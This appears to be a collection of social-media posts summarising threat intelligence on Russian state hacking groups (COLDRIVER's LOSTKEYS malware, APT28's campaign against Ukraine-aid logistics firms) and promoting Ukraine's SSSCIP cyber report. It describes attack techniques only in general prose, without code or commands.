Cybersecurity Risks for Ukraine-Linked Professionals

Ukrainian Cyber Defense Over the past two weeks, the activity of russian hacker groups and special units has remained low. Their primary objective continues to be gaining access to information systems of state agencies, situational awareness systems of the Ukrainian Defense Forces, and personal and official accounts of government officials and military personnel. The most effective and prevalent attack vector employed by the enemy involves phishing emails and messages sent through Signal, WhatsApp, Telegram, as well as the distribution of malware via infected USB drives and compromised popular software images. The most frequently observed malware families being disseminated include DarkTortilla, IDAT Loader, MassLogger, QuasarRAT, Remcos RAT, Vidar, and XWorm. Additionally, there has been a notable increase in demand among russian intelligence services on Darknet forums for purchasing Instagram accounts of Ukrainian citizens. Accounts associated with popular Ukrainian email services i.ua and ukr.net are especially prioritized. These accounts could potentially be used for information operations and spreading malware. The FSB’s 18th Center hacker group UAC-0036/Callisto has begun deploying new malware named LOSTKEYS in cyberattacks targeting current and former high-ranking officials in partner countries, journalists, research centers, NGOs, and companies supporting Ukraine. The new malware is disseminated through targeted, personalized email campaigns and is designed to steal account credentials and files. The group employs a sophisticated multi-stage tactic called ClickFix, starting with the creation of a decoy site with a fake CAPTCHA. During CAPTCHA verification, a PowerShell script is copied to the clipboard along with instructions on how to execute it. Once executed, the script downloads the subsequent malware components. The low level of enemy activity against Ukraine may be linked to russia’s intensified efforts to interfere in the political and economic processes of EU countries and former Soviet states. Specifically, there is ongoing interference in the presidential elections in Poland. In the lead-up to the election day, Russian intelligence units are ramping up their capabilities to spread disinformation and conduct destructive cyberattacks. A significant development is the release of a new policy draft by the International Criminal Court, which proposes extending its jurisdiction to include cybercrimes. The draft introduces amendments to the Rome Statute, expanding the four main types of international crimes — genocide, war crimes, crimes against humanity, and international military aggression — to include cybercrimes. The ICC Prosecutor is considering expanding its mandate in response to the extensive use of cyberattacks by Russia against civilian targets, both in Ukraine and EU countries. The war continues. Ukrainians defend their land and independence. #cyberwar #cyberdefence P.S. cyber weapons in the sense of AI

Our team at Google Threat Intelligence Group is sharing new findings on the evolving tactics of COLDRIVER. This Russian government-backed group, historically focused on credential phishing, is now deploying new malware called LOSTKEYS to exfiltrate documents from targeted systems. We've observed LOSTKEYS campaigns in early 2025 targeting current and former advisors to Western governments, military, journalists, and NGOs, often those connected to Ukraine. The primary goal appears to be intelligence collection. We're sharing this information, including technical details, IOCs, and YARA rules, to help the security community protect against these threats. We've added identified malicious domains and files to Safe Browsing and alerted targeted Google users. We encourage at-risk individuals to use Google's Advanced Protection Program and enable Enhanced Safe Browsing. Read the full report here: https://lnkd.in/gNk39vSR

A joint cybersecurity advisory, involving a dozen allied agencies including France’s ANSSI, has documented a large-scale cyber-espionage campaign led by Russia’s #GRU🇷🇺🐻 Unit 26165 (APT28/Fancy Bear). Active since 2022, the operation targets Western logistics and tech firms involved in coordinating and delivering military aid to Ukraine. * What is happening? The campaign seeks to obtain sensitive logistical data—such as shipment contents, routes, and identities of senders and recipients. * How is it being conducted? APT28 uses spearphishing, brute force, credential theft, and software exploits (e.g., Outlook, Roundcube, WinRAR), as well as hacked IP cameras. Once access is gained, they leverage native tools (Impacket, PsExec, RDP), abuse Active Directory, and exfiltrate data via IMAP or EWS. Mailbox permissions are manipulated for prolonged espionage. IP cameras, particularly near the Ukrainian border and in countries like #Romania and #Poland, are exploited for real-time surveillance using default or brute-forced credentials. * Who is being targeted? The campaign impacts #NATO members and Ukraine, affecting both government and private entities across defense, transportation, maritime, and IT sectors. Critical infrastructure like air traffic systems, ports, and industrial control systems are among the main targets. Why it matters: This advisory underscores the need for increased vigilance among #Ukraine🇺🇦-supporting entities. It highlights a sophisticated, persistent threat actor aiming to undermine Western logistical and military support through targeted cyber intrusions.

Major Cybersecurity Alert - Russian GRU Unleashes Sophisticated Campaign Against Western Supply Lines A devastating new intelligence report reveals how Russian military hackers have been systematically infiltrating the backbone of Western aid to Ukraine - targeting the very companies moving critical supplies across borders. The Scope is Staggering: • 85th Main Special Service Center (Unit 26165) - Russia's elite cyber warfare unit - has compromised dozens of logistics companies across 13 countries • Victims include major transportation hubs, ports, airports, maritime companies, and IT service providers • The operation spans from Bulgaria to the United States, with over 10,000 IP cameras hijacked to monitor aid shipments in real-time Their Methods: The hackers didn't just break into networks - they studied their targets like predators. They identified key personnel, mapped business relationships, and exploited trust between partner companies. Once inside, they accessed the most sensitive intelligence: train schedules, shipping manifests, container numbers, cargo contents, and exact travel routes of aid shipments to Ukraine. The Most Disturbing Discovery: Russians positioned themselves to watch everything. They compromised traffic cameras and private security cameras near border crossings and military installations. Camera targets were positioned to monitor aid flowing into the country. They could literally watch Western aid arrive and coordinate attacks accordingly. How They Got In: • Exploited Microsoft Outlook vulnerabilities to steal credentials • Used fake login pages impersonating government entities • Weaponized WinRAR file compression software • Conducted massive password-spraying campaigns • Even attempted voice phishing, calling victims while impersonating IT staff The Persistence Factor: Once inside corporate email systems, they manipulated mailbox permissions for sustained access, enrolled compromised accounts in multi-factor authentication to appear legitimate, and used legitimate Microsoft Exchange protocols to blend their data theft with normal business operations. Why This Matters: This isn't just corporate espionage - it's military intelligence gathering that directly threatens Ukrainian defense capabilities. Every compromised shipment manifest potentially enables Russian forces to target aid convoys, anticipate weapon deliveries, or disrupt critical supply chains. The investigation involved 15+ international intelligence agencies, highlighting how seriously Western governments view this threat. Organizations handling sensitive logistics or supporting Ukrainian aid efforts should immediately review their cybersecurity posture and monitor for the specific indicators outlined in this advisory. #CyberSecurity #Ukraine #Russia #NationalSecurity #Logistics

#CyberWarfare is No Longer #Theoretical. It’s #Tactical, #Coordinated, and #Global. Sharing the official SSSCIP 3-Year Cybersecurity Report from #Ukraine — "WAR AND CYBER: Three Years of Struggle and Lessons for Global Security" (2022–2024). This report is not just a recount of Ukraine’s #resilience under relentless cyberattacks during full-scale war — it is a blueprint for national-level cyber defense, strategic coordination, and international collaboration. Inside the Report: - Deep analysis of over 4,000+ cyber incidents from 2022–2024 - Tactical evolution of Russian #APT groups including #Sandworm, #Gamaredon & #APT29 - How cyber operations were synchronized with missile strikes - Critical infrastructure targeting strategy: Energy → Telecom → IT Systems - Ukraine’s transition from cyber resilience to proactive cyber defense - Joint response frameworks for NATO, EU & global allies Key Takeaways: - Cyber #threats now accompany every kinetic operation. - Cyber #defense is not only about tools — it’s about real-time coordination between governments, private sector, and international #CERTs. - Global cyber resilience depends on collective visibility, intelligence sharing, and shared infrastructure protections. Read the full whitepaper to understand how modern warfare is fought on invisible frontlines: Let’s work toward a more secure digital future — together. #CyberSecurity #WarAndCyber #UkraineCyberDefense #APT #SSSCIP #CyberResilience #NationalSecurity #GlobalSecurity #ThreatIntelligence #NATO #CyberReport #CyberWarfare #CERTUA